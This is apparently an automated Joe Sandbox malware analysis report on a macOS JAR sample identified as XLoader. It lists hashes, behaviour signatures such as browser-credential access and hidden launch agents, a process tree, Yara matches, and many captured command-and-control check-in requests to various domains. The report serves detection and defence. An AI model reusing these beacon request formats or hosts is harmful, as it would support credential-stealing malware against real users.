Play interactive tour

Edit tour

macOS Analysis Report Statement SKBMT 09818.jar

Overview

General Information

Sample Name:	Statement SKBMT 09818.jar
Analysis ID:	1032
MD5:	4ded6a1d590e8a31ae6b9ea0ffb3331d
SHA1:	b8c0167341d3639eb1ed2636a56c272dc66546fa
SHA256:	81c4276f2e3c0ed456b08402a6a5b63d0cad68220b7a3275b3cbf0ba73faaa21
Infos:
Most interesting Screenshot:

Detection

XLoader

Score:	92
Range:	0 - 100
Whitelisted:	false

Signatures

Found XLoader JAR binder / loader

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected XLoader

Accesses directories and/or files with sensitive browser data likely for credential stealing

Denies being traced/debugged (via ptrace PT_DENY_ATTACH)

Executes hidden files

Java spawns dropped Mach-O files

Writes Mach-O files to hidden directories

Changes permissions of written Mach-O files

Creates application bundles

Creates hidden files, links and/or directories

Creates memory-persistent launch services

Creates user-wide 'launchd' managed services aka launch agents

Executes commands using a shell command-line interpreter

HTTP GET or POST without a user agent

Mach-O contains sections with high entropy indicating compressed/encrypted content

Reads hardware related sysctl values

Reads launchservices plist files

Reads the sysctl safe boot value (probably to check if the system is in safe boot mode)

Reads the systems OS release and/or type

Reads the systems hostname

Writes 64-bit Mach-O files to disk

Classification

Analysis Advice

Some HTTP requests failed (404). It is likely the sample will exhibit less behavior

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	1032
Start date:	22.07.2021
Start time:	14:09:40
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 6s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Statement SKBMT 09818.jar
Cookbook file name:	defaultmacfilecookbook.jbs
Analysis system description:	Virtual Machine, High Sierra (Office 2016 v16.16, Java 11.0.2+9, Adobe Reader 2019.010.20099)
Analysis Mode:	default
Detection:	MAL
Classification:	mal92.troj.spyw.evad.macJAR@0/9@24/0
Warnings:	Show All Excluded IPs from analysis (whitelisted): 17.253.109.201, 17.253.113.202, 17.253.113.201, 17.253.54.253, 17.253.54.125, 17.253.108.253, 17.253.108.125, 17.253.54.251 Excluded domains from analysis (whitelisted): ocsp.apple.com, valid.origin-apple.com.akadns.net, time-macos.apple.com, time-osx.g.aaplimg.com, ocsp-a.g.aaplimg.com, valid-apple.g.aaplimg.com, crl.apple.com, valid.apple.com, ocsp-lb.apple.com.akadns.net, lb._dns-sd._udp.0.11.168.192.in-addr.arpa VT rate limit hit for: zincfacemask.com

Process Tree

System is macvm-highsierra

xpcproxy New Fork (PID: 554, Parent: 1)

Jar Launcher (MD5: fbf3f7600341147960760ba67d456816) Arguments: /System/Library/CoreServices/Jar Launcher.app/Contents/MacOS/Jar Launcher

Jar Launcher New Fork (PID: 555, Parent: 554)

java (MD5: f1ccfcbe272f38c2cdafba7a7ddfc5dc) Arguments: /usr/bin/java -jar /Users/berri/Desktop/Statement SKBMT 09818.jar

java (MD5: 1f2f4e0dc30c84d99d4d852fd4400c92) Arguments: /usr/bin/java -jar /Users/berri/Desktop/Statement SKBMT 09818.jar

jspawnhelper New Fork (PID: 556, Parent: 555)

kIbwf02l (MD5: a17bf4533d7ec677a0d4bdae19e41ff2) Arguments: /Users/berri/kIbwf02l

sh New Fork (PID: 557, Parent: 556)

NBNlRBXH (MD5: a17bf4533d7ec677a0d4bdae19e41ff2) Arguments: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH

xpcproxy New Fork (PID: 558, Parent: 1)

Preview (MD5: 14cc1485ead8fac8c80d49d481383f69) Arguments: /Applications/Preview.app/Contents/MacOS/Preview

cleanup

Yara Overview

Dropped Files

Source	Rule	Description	Author	Strings
/Users/berri/kIbwf02l	JoeSecurity_XLoader	Yara detected XLoader	Joe Security
/Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH	JoeSecurity_XLoader	Yara detected XLoader	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
00000556.00000248.9.0000000100000000.000000010001e000.r-x.sdmp	JoeSecurity_XLoader	Yara detected XLoader	Joe Security
00000556.00000248.1.0000000100000000.000000010001e000.r-x.sdmp	JoeSecurity_XLoader	Yara detected XLoader	Joe Security

Jbx Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Multi AV Scanner detection for submitted file

Show sources

Source: Statement SKBMT 09818.jar

Virustotal: Detection: 35%

Perma Link

Yara detected XLoader

Show sources

Source: Yara match	File source: 00000556.00000248.9.0000000100000000.000000010001e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 00000556.00000248.1.0000000100000000.000000010001e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: /Users/berri/kIbwf02l, type: DROPPED
Source: Yara match	File source: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH, type: DROPPED

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49194 -> 66.235.200.145:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49194 -> 66.235.200.145:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49194 -> 66.235.200.145:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49204 -> 66.235.200.145:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49204 -> 66.235.200.145:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.11:49204 -> 66.235.200.145:80

Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.zincfacemask.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ= HTTP/1.1Host: www.drlindaydevenish.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=bSD8cgpR5ntFwzbblKxh4wOPXMt5Oc1BLDstRqvHLxZto1kTUYMBYfJsaKYRdlMQ7bU=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.exploringelleblog.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=oc50TZofanKE4OmiynCq+A3QiQmQIphVePEYRahqDysvKhIE5Y/KAoUYwZ5rcgVCk9Q=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.hypesoleco.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE= HTTP/1.1Host: www.electricbrandsusa.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=f3+4JyRRXqttYmHOJtHkgtOVZkuLzcdYPYewf1Ia/hTU1x6gT5iP1ArKLbqZ6wZ0Bs4=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.decoratudo.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=VOJxqPpT4TZfe5+mzy/TF8Fx6jBndKocPNySX/cZgaLwI1hm8w1FA9qJPxWm33MukXI= HTTP/1.1Host: www.rshuahui.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=3E0E9n5SFvWwJnwcABjxRj5v3OU+/jsFDnVbSPNjQamTlrDxZvmfeSNzw/DQt+dCP6g=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.lidokeyhomes.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=KB/hGxR/Lqs+Chw0WEHkIMiUmhqlwDPOM0f42bu5MD76tw/w/jFEPszJr3ceFx21RCg= HTTP/1.1Host: www.iregentos.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=O5eC9V//VYy6G6ibCfKbN71kBBTBb7n/AHYpObDlg9EvYToFeZvwaLu3dTwEP8NC4vI=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.dutythrow.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.zincfacemask.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ= HTTP/1.1Host: www.drlindaydevenish.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=bSD8cgpR5ntFwzbblKxh4wOPXMt5Oc1BLDstRqvHLxZto1kTUYMBYfJsaKYRdlMQ7bU=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.exploringelleblog.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=oc50TZofanKE4OmiynCq+A3QiQmQIphVePEYRahqDysvKhIE5Y/KAoUYwZ5rcgVCk9Q=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.hypesoleco.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE= HTTP/1.1Host: www.electricbrandsusa.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=f3+4JyRRXqttYmHOJtHkgtOVZkuLzcdYPYewf1Ia/hTU1x6gT5iP1ArKLbqZ6wZ0Bs4=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.decoratudo.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=VOJxqPpT4TZfe5+mzy/TF8Fx6jBndKocPNySX/cZgaLwI1hm8w1FA9qJPxWm33MukXI= HTTP/1.1Host: www.rshuahui.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=3E0E9n5SFvWwJnwcABjxRj5v3OU+/jsFDnVbSPNjQamTlrDxZvmfeSNzw/DQt+dCP6g=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.lidokeyhomes.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=KB/hGxR/Lqs+Chw0WEHkIMiUmhqlwDPOM0f42bu5MD76tw/w/jFEPszJr3ceFx21RCg= HTTP/1.1Host: www.iregentos.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=O5eC9V//VYy6G6ibCfKbN71kBBTBb7n/AHYpObDlg9EvYToFeZvwaLu3dTwEP8NC4vI=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.dutythrow.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.zincfacemask.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ= HTTP/1.1Host: www.drlindaydevenish.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:

Source: unknown	TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown	TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown	TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown	TCP traffic detected without corresponding DNS query: 17.171.27.65
Source: unknown	TCP traffic detected without corresponding DNS query: 2.20.214.243
Source: unknown	TCP traffic detected without corresponding DNS query: 2.20.214.243
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.zincfacemask.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ= HTTP/1.1Host: www.drlindaydevenish.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=bSD8cgpR5ntFwzbblKxh4wOPXMt5Oc1BLDstRqvHLxZto1kTUYMBYfJsaKYRdlMQ7bU=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.exploringelleblog.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=oc50TZofanKE4OmiynCq+A3QiQmQIphVePEYRahqDysvKhIE5Y/KAoUYwZ5rcgVCk9Q=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.hypesoleco.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE= HTTP/1.1Host: www.electricbrandsusa.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=f3+4JyRRXqttYmHOJtHkgtOVZkuLzcdYPYewf1Ia/hTU1x6gT5iP1ArKLbqZ6wZ0Bs4=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.decoratudo.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=VOJxqPpT4TZfe5+mzy/TF8Fx6jBndKocPNySX/cZgaLwI1hm8w1FA9qJPxWm33MukXI= HTTP/1.1Host: www.rshuahui.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=3E0E9n5SFvWwJnwcABjxRj5v3OU+/jsFDnVbSPNjQamTlrDxZvmfeSNzw/DQt+dCP6g=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.lidokeyhomes.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=KB/hGxR/Lqs+Chw0WEHkIMiUmhqlwDPOM0f42bu5MD76tw/w/jFEPszJr3ceFx21RCg= HTTP/1.1Host: www.iregentos.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=O5eC9V//VYy6G6ibCfKbN71kBBTBb7n/AHYpObDlg9EvYToFeZvwaLu3dTwEP8NC4vI=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.dutythrow.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.zincfacemask.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ= HTTP/1.1Host: www.drlindaydevenish.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=bSD8cgpR5ntFwzbblKxh4wOPXMt5Oc1BLDstRqvHLxZto1kTUYMBYfJsaKYRdlMQ7bU=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.exploringelleblog.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=oc50TZofanKE4OmiynCq+A3QiQmQIphVePEYRahqDysvKhIE5Y/KAoUYwZ5rcgVCk9Q=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.hypesoleco.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=bE78K2Bz+/CXY2nQITW36rn+0GrpWVlH+jAbjeXqei0CcIe0I80ZqNLepNcvbb0MLhE= HTTP/1.1Host: www.electricbrandsusa.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=f3+4JyRRXqttYmHOJtHkgtOVZkuLzcdYPYewf1Ia/hTU1x6gT5iP1ArKLbqZ6wZ0Bs4=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.decoratudo.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=VOJxqPpT4TZfe5+mzy/TF8Fx6jBndKocPNySX/cZgaLwI1hm8w1FA9qJPxWm33MukXI= HTTP/1.1Host: www.rshuahui.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=3E0E9n5SFvWwJnwcABjxRj5v3OU+/jsFDnVbSPNjQamTlrDxZvmfeSNzw/DQt+dCP6g=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.lidokeyhomes.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=KB/hGxR/Lqs+Chw0WEHkIMiUmhqlwDPOM0f42bu5MD76tw/w/jFEPszJr3ceFx21RCg= HTTP/1.1Host: www.iregentos.infoConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=O5eC9V//VYy6G6ibCfKbN71kBBTBb7n/AHYpObDlg9EvYToFeZvwaLu3dTwEP8NC4vI=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.dutythrow.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?50Mtkha=UoxjFrCWiwNksAbvx7vsSrGh4Jf9M5+wCTBefQDnciuV3ZQ1R5IcHTpEZV3cBk1sVrk=&sVz=mTIXNHKp2vxxM HTTP/1.1Host: www.zincfacemask.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /09rb/?sVz=mTIXNHKp2vxxM&50Mtkha=ALk8/etE/7DWTGf8eDu4sPRDKS2Cu4LYW+v7W2bdhIEneQ9mXehQdpwrvh6FQ8TA5NQ= HTTP/1.1Host: www.drlindaydevenish.comConnection: closeData Raw: 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.ssmjoin.com

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 22 Jul 2021 12:11:17 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Vary: Accept-Encodinghost-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==X-Endurance-Cache-Level: 2CF-Cache-Status: MISSServer: cloudflareCF-RAY: 672c920cacb70211-ZRHData Raw: 32 32 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 09 09 3c 74 69 74 6c 65 3e 0a 09 09 09 45 78 70 6c 6f 72 69 6e 67 20 45 6c 6c 65 20 26 6d 64 61 73 68 3b 20 43 6f 6d 69 6e 67 20 53 6f 6f 6e 09 09 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 09 09 3c 73 63 72 69 70 74 0a 09 09 09 73 72 63 3d 22 68 74 74 70 3a 2f 2f 65 78 70 6c 6f 72 69 6e 67 2d 65 6c 6c 65 2e 63 6f 6d 2f 77 70 2d 69 6e 63 6c 75 64 65 73 2f 6a 73 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 36 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 09 09 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 22 68 74 74 70 3a 2f 2f 65 78 70 6c 6f 72 69 6e 67 2d 65 6c 6c 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 62 6c 75 65 68 6f 73 74 2d 77 6f 72 64 70 72 65 73 73 2d 70 6c 75 67 69 6e 2f 73 74 61 74 69 63 2f 69 6d 61 67 65 73 2f 63 73 2d 62 6c 75 65 68 6f 73 74 2d 62 67 2e 6a 70 67 22 29 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 20 74 6f 70 20 72 69 67 68 74 3b 0a 09 09 09 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 6e 6f 2d 72 65 70 65 61 74 3b 0a 09 09 09 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 4f 70 65 6e 20 53 61 6e 73 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 09 09 09 09 6f 76 65 72 66 6c 6f 77 2d 78 3a 20 68 69 64 64 65 6e 3b 0a 09 09 09 7d 0a 0a 09 09 09 2a 20 7b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 09 2d 6d 6f 7a 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 09 2d 77 65 62 6b 69 74 2d 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 0a 09 09 09 69 6e 70 75 74 20 7b 0a 09 09 09 09 66 6f 6e 74

Source: java, 00000555.00000246.9.0000000106fed000.0000000107008000.r--.sdmp	String found in binary or memory: http://crl.apple.com/codesigning.crl0
Source: java, 00000555.00000246.1.000000010254f000.0000000102556000.r--.sdmp	String found in binary or memory: http://crl.apple.com/root.crl0
Source: java, 00000555.00000246.1.000000010254f000.0000000102556000.r--.sdmp	String found in binary or memory: http://crl.apple.com/timestamp.crl0
Source: java, 00000555.00000246.9.00000001025ab000.00000001025c8000.r-x.sdmp	String found in binary or memory: http://java.oracle.com/
Source: java, 00000555.00000246.1.000000010254f000.0000000102556000.r--.sdmp	String found in binary or memory: http://ocsp.apple.com/ocsp04-devid010
Source: java, 00000555.00000246.9.0000000106fed000.0000000107008000.r--.sdmp	String found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
Source: java, 00000555.00000246.9.0000000106fed000.0000000107008000.r--.sdmp	String found in binary or memory: http://www.apple.com/appleca/root.crl0
Source: java, 00000555.00000246.1.000000010254f000.0000000102556000.r--.sdmp	String found in binary or memory: http://www.apple.com/appleca0
Source: java, 00000555.00000246.9.0000000106fed000.0000000107008000.r--.sdmp	String found in binary or memory: http://www.apple.com/certificateauthority0
Source: java, 00000555.00000246.9.00000001230e8000.00000001232a1000.r--.sdmp	String found in binary or memory: http://www.apple.com/http://www.apple.com/Copyright
Source: java, 00000555.00000246.9.0000000106fed000.0000000107008000.r--.sdmp	String found in binary or memory: https://www.apple.com/appleca/0

Source: unknown	Network traffic detected: HTTP traffic on port 49180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49180

E-Banking Fraud:

Yara detected XLoader

Show sources

Source: Yara match	File source: 00000556.00000248.9.0000000100000000.000000010001e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: 00000556.00000248.1.0000000100000000.000000010001e000.r-x.sdmp, type: MEMORY
Source: Yara match	File source: /Users/berri/kIbwf02l, type: DROPPED
Source: Yara match	File source: /Users/berri/.gLUpQD8hXDj8/NBNlRBXH.app/Contents/MacOS/NBNlRBXH, type: DROPPED

System Summary:

Found XLoader JAR binder / loader

Show sources

Source: oBSrz/OBSrz.java

Java decompliation: Binder APIs

Source: classification engine

